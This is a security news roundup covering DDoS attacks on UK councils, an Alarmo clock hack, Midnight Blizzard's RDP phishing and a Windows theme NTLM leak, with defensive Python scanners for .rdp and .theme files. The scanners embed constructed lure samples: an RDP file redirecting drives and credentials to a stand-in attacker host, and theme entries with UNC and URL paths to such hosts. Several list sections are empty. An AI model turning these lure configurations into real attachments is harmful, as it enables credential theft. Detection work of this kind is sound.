Local Authority Websites Disrupted Amid Heightened Support for Ukraine
Several UK councils faced widespread website outages this week after pro-Russian cyber actors launched Distributed Denial-of-Service (DDoS) attacks, seemingly in response to the UK’s renewed support for Ukraine. The initial wave of attacks began on Tuesday 29th October, impacting websites for councils in areas such as Bradford, Eastleigh, Keighley, Salford, Tameside, and Trafford. Eastleigh, Trafford, and Salford councils reported continued disruption through Wednesday, with Salford’s site remaining inaccessible into the afternoon and later returning with warnings of technical issues.
An updated list of targeted entities, circulated on Thursday, included additional councils and smaller financial institutions. New victims included the council websites of Middlesbrough, Medway, and Hastings, which experienced similar downtimes. Other councils, such as Plymouth and Bournemouth-Christchurch-Poole (BCP), displayed banners indicating site-wide technical difficulties. Notably, Premier League football club Tottenham Hotspur was also affected, with its website returning an Error 500 message.
Coordinated DDoS Effort Led by NoName Group
The pro-Russian group NoName057(16) reportedly orchestrated these DDoS attacks, using instructions communicated via its leadership. Target lists specifying domains and IP addresses are circulated among group members, who then execute the attacks in a coordinated manner. The group justified the latest attacks by citing month-old news stories on the UK’s support for Ukraine, framing these actions as retaliation.
Only two councils—Hastings and BCP—confirmed that DDoS attacks were responsible for the service disruptions. Hastings Borough Council’s deputy leader, Councillor Glenn Haffenden, confirmed that the council had experienced an attack, with the National Cyber Security Centre (NCSC) indicating a likely pro-Russian motive, although the attribution was not definitive.
The NCSC has provided assistance and guidance to affected councils, advising them on mitigating the impact of DDoS attacks. A spokesperson from the NCSC stated that while DDoS attacks are typically low in sophistication and impact, they can nonetheless disrupt services by denying access to legitimate users.
Efforts to Restore Services Amid Ongoing Challenges
Middlesbrough Council’s social media team attributed its website outage to “suspected online hackers,” assuring the public that no data or services were at risk. Similarly, Salford Council’s issues persisted, despite the website being partially restored on Wednesday. On Thursday, Salford Council’s social media account referred to continued “issues with the web pages and maps.”
Notably, none of the councils denied a link between the attacks and their website outages, although few provided details on the technical causes of the disruptions. Eastleigh Council’s issues stemmed from limitations in Azure App Service, while Trafford’s on-site web server reportedly struggled under the strain of incoming traffic, resulting in further outages.
NoName’s Activity
The NoName group is part of a larger set of pro-Russian hacktivists active since Russia’s invasion of Ukraine. Operating through Telegram channels, NoName regularly publishes lists of targets—typically entities perceived as adversarial to Russia’s interests. In previous instances, the group has responded to geopolitical events or arrests of its members by launching attacks on high-profile targets. For example, following the arrest of three alleged NoName members by Spanish authorities in July, the group disabled the websites of major Spanish seaports in retaliation.
While DDoS attacks like these can cause temporary disruptions, their long-term impact on operations remains limited. The FBI has previously commented on the minimal technical effects of such attacks, noting that they tend to produce more psychological than practical consequences. The agency highlighted that pro-Russian hacktivist groups often exaggerate the success of these attacks on social media, aiming to amplify their psychological impact rather than achieve operational disruption.
Rising Threat from Automated Attack Tools
NoName’s DDoSia Project, a tool enabling even unskilled users to participate in DDoS campaigns, currently has over 77,000 followers on its main Telegram channel. This tool automates DDoS attacks, allowing supporters to participate in the group’s campaigns with minimal technical know-how. This amplification of cyber aggression suggests that DDoS attacks may persist as a disruptive threat, particularly for organisations with limited resources to defend against high-traffic attacks.
Hacker Unlocks Nintendo Alarm Clock for Custom Code Execution
A hacker known as GaryOderNichts has successfully breached the security of Nintendo’s recently released Alarmo alarm clock, allowing him to run custom code on the device.
Nintendo’s Alarmo, marketed as a fun way to wake up, is designed with a retro-inspired red, round body and an interactive screen. The device can play sounds and music from classic Nintendo games to help users start their day. The device has gained interest from Nintendo enthusiasts.
Opening the Alarmo required removing a single screw next to its USB-C port, giving access to its internal components. Earlier work had located the Alarmo’s Serial Wire Debug (SWD) pins on the circuit board and produced code to access and extract the contents of its embedded multimedia card (eMMC). This eMMC storage holds encrypted game-themed content files as well as various system files.
Building on these discoveries, GaryOderNichts used a Raspberry Pi connected to the SWD pins to exploit a vulnerability in the cryptographic processor’s interface. This enabled him to retrieve the AES-128-CTR encryption key used to secure the Alarmo’s content files. With the key in hand, Gary gained insight into the device’s boot sequence, which allowed him to load firmware binaries over USB and run custom code, demonstrated by displaying an image of a cat on the Alarmo’s screen.
Russian Threat Group Uses Sophisticated Tactics to Target Sensitive Organisations
Microsoft’s Threat Intelligence team recently uncovered a significant phishing campaign by the Russian-affiliated threat actor Midnight Blizzard, also known as APT29, UNC2452, or Cozy Bear. Linked to Russia’s Foreign Intelligence Service (SVR), this campaign, launched on October 22, 2024, leverages weaponised Remote Desktop Protocol (RDP) files to conduct cyber espionage across sectors worldwide.
Targets and Methods
This campaign is aimed at various high-profile sectors, including:
Threat actors used highly targeted spear-phishing emails containing malicious RDP configuration files. When victims open these files, they unknowingly connect to attacker-controlled servers, exposing their systems to external control. A hallmark of this attack is the impersonation of Microsoft employees, abuse of cloud service providers’ trusted relationships, and deployment of specialised malware such as “FOGGYWEB” and “MAGICWEB,” both targeting Active Directory Federation Services (AD FS) for unauthorised access.
Attack Tactics and Techniques
Midnight Blizzard’s techniques include credential theft via supply chain compromises, enabling lateral movement from on-premises networks to cloud environments. This has impacted thousands of users in over 100 organisations, primarily in the United States and Europe. CERT-UA (Ukraine’s Computer Emergency Response Team) and Amazon independently verified this campaign, tracking it as UAC-0215. Uniquely, this campaign uses signed RDP configuration files, marking a new tactic in Midnight Blizzard’s espionage efforts, which date back to 2018.
In their phishing campaign, Midnight Blizzard distributed misleading emails impersonating Microsoft, Amazon Web Services (AWS), and Zero Trust security policies. The weaponised RDP files allow for two-way resource sharing, potentially exposing sensitive data such as local hard drives, clipboard contents, peripheral devices, audio systems, and even Windows authentication credentials, including smart cards and Windows Hello.
With this access, attackers can install malware or Remote Access Trojans (RATs) in AutoStart locations, ensuring persistent access even after RDP sessions are terminated. Targets span regions, including the UK, Europe, Australia, and Japan, where attackers used compromised email addresses from legitimate organisations to increase credibility.
System Component Exposure
Through RDP configuration manipulation, threat actors gained access to multiple system elements, including connected network drives, POS systems, and web authentication mechanisms using passkeys and security keys. This broad access allows the attackers to establish comprehensive, persistent control beyond the initial intrusion.
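The resource-sharing settings described in the two passages above (drives, clipboard, smart cards, WebAuthn keys, audio) are ordinary `.rdp` key:type:value lines, so a mail gateway or SOC script can flag an attachment before anyone opens it. The following is an added triage example written for this page, not Microsoft’s detection logic or any tool’s own code; the host name, the allowlist and the signature value are constructed placeholders.

```python
# Standard .rdp setting names that hand local resources to the remote host once
# the session is up; the page lists the corresponding exposures.
RISKY_SETTINGS = {
    "drivestoredirect": "local drives exposed to the remote host",
    "redirectclipboard": "clipboard shared with the remote host",
    "redirectsmartcards": "smart card / Windows Hello credentials forwarded",
    "redirectprinters": "printers redirected",
    "redirectcomports": "serial (COM) ports redirected",
    "usbdevicestoredirect": "USB devices redirected",
    "audiocapturemode": "microphone forwarded",
    "redirectwebauthn": "WebAuthn passkeys / security keys forwarded",
}

def parse_rdp(text):
    """Parse 'key:type:value' lines into {key: (type, value)}; skips malformed lines."""
    settings = {}
    for line in text.splitlines():
        parts = line.strip().split(":", 2)
        if len(parts) == 3:
            settings[parts[0].lower()] = (parts[1], parts[2])
    return settings

def enabled(setting):
    """True when an 'i' setting is non-zero or an 's' setting is non-empty (e.g. '*')."""
    typ, value = setting
    return value.strip() != "0" if typ == "i" else value.strip() != ""

def triage_rdp(text, trusted_hosts):
    """Return human-readable findings for one .rdp file; an empty list means nothing flagged."""
    s = parse_rdp(text)
    findings = []
    host = s.get("full address", ("s", ""))[1].split(":")[0].lower()
    if host and not any(host == t or host.endswith("." + t) for t in trusted_hosts):
        findings.append(f"connects to non-allowlisted host {host}")
    for key, why in RISKY_SETTINGS.items():
        if key in s and enabled(s[key]):
            findings.append(f"{key} enabled: {why}")
    if "signature" in s:
        findings.append("embedded signature present: verify the signer before trusting the file")
    return findings

# Constructed sample resembling a lure attachment; the host and signature are placeholders.
SAMPLE = """full address:s:rdp.example-attacker.test:3389
drivestoredirect:s:*
redirectclipboard:i:1
redirectsmartcards:i:1
redirectwebauthn:i:1
redirectprinters:i:0
audiocapturemode:i:1
signature:s:PLACEHOLDER
"""
```

Calling `triage_rdp(SAMPLE, ["corp.example"])` reports the non-allowlisted host, each enabled redirection, and the presence of a signature, while the `redirectprinters:i:0` line is correctly ignored.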
Mitigation Measures
Organisations are encouraged to apply the following mitigations to guard against these types of attacks:
Indicators of Compromise (IoCs)
Sender Domains:
Malicious RDP File Names:
This Midnight Blizzard phishing campaign represents a highly sophisticated approach to cyber espionage, employing RDP files to bypass conventional defences and gain control over critical systems.
Unpatched Windows Theme Vulnerability Enables NTLM Credential Theft
A newly identified zero-day vulnerability in Windows Themes could allow attackers to steal NTLM credentials from affected systems, even after Microsoft’s recent patch (CVE-2024-38030) attempted to address this issue. Acros Security researchers report that Microsoft’s patch falls short of fully mitigating the risk, leaving several Windows versions, including the latest Windows 11 (24H2), still vulnerable.
Background on the Windows Theme Vulnerability
Akamai security researcher Tomer Peled initially discovered that specific Windows theme files containing network file paths could prompt Windows to send authenticated network requests to remote servers. Malicious theme files, when opened from a desktop or folder, could leak user credentials without further interaction, exploiting the system's automatic network request feature.
This vulnerability was initially patched by Microsoft under CVE-2024-21320. However, Peled’s further analysis found that Microsoft’s patch, which uses the PathIsUNC function to block network paths in theme files, could still be bypassed.
Peled notified Microsoft of this bypass capability, leading to a new patch under CVE-2024-38030. Despite this, researchers found that the vulnerability still affects all currently supported Windows versions, including fully updated installations of Windows 11 24H2.
Researchers Develop Independent Patch to Close Security Gaps
To address the vulnerability comprehensively, researchers have created a patch through 0patch’s micropatch service, which is now available for free until Microsoft issues an official update. This micropatch blocks all network requests within theme files, effectively sealing off any paths that could leak NTLM credentials by analysing theme files for potential network references.
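The credential-leak trigger described above is a theme file whose path values point at a network location, and the 0patch approach is to look for such references in the file itself. The following added example, written for this page and not 0patch’s or Microsoft’s code, does the same kind of inspection on a `.theme` file so a defender can screen themes before they are applied; it flags every value that names a network location rather than modelling the specific PathIsUNC bypass, and the sample theme and host names are constructed.

```python
import re

# Value shapes that point off the local machine: UNC paths (\\host\share), their
# forward-slash form, and URL schemes. This is a constructed triage check, not
# Microsoft's PathIsUNC logic and not 0patch's micropatch.
NETWORK_REF = re.compile(r"^(\\\\|//|[a-z][a-z0-9+.\-]*://)", re.IGNORECASE)

def parse_theme(text):
    """Parse the INI-style .theme file into a list of (section, key, value)."""
    entries, section = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif "=" in line:
            key, value = line.split("=", 1)
            entries.append((section, key.strip(), value.strip().strip('"')))
    return entries

def find_network_refs(text):
    """Return every (section, key, value) whose value names a network location.
    Environment variables such as %SystemRoot% are not expanded, so a value that
    only becomes remote after expansion is not caught here."""
    return [e for e in parse_theme(text) if NETWORK_REF.search(e[2])]

# Constructed sample: one UNC wallpaper and one URL cursor alongside local entries.
SAMPLE_THEME = """[Theme]
DisplayName=Quarterly Report Theme
[Control Panel\\Desktop]
Wallpaper=\\\\files.example-attacker.test\\share\\wall.jpg
[Slideshow]
ImagesRootPath=%SystemRoot%\\Web\\Wallpaper
[Control Panel\\Cursors]
Arrow=https://cdn.example-attacker.test/cursor.cur
[Sounds]
SystemStart=%SystemRoot%\\media\\start.wav
"""

if __name__ == "__main__":
    for section, key, value in find_network_refs(SAMPLE_THEME):
        print(f"[{section}] {key} -> {value}")
```

A theme that produces any hit should be treated as untrusted, since merely browsing to it in Explorer is enough to trigger the outbound request described above.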
The micropatches cover fully updated versions of both legacy and currently supported Windows Workstation systems:
Scope of the Patch and Vulnerability on Windows Server
The vulnerability primarily impacts Windows Workstation systems. For Windows Server environments, the “Desktop Experience” feature must be installed to apply themes, and the theme file must be actively opened to trigger credential leaks. Consequently, no patch was created for Windows Server, as the risk remains minimal without these conditions.
This zero-day vulnerability highlights the importance of secure network path handling within theme files and underscores a gap in current defences. While Microsoft’s patches have attempted to contain the vulnerability, the micropatch by 0patch offers a critical interim measure to protect against credential theft.
Contact Periculo for expert cyber security solutions tailored to the digital health industry.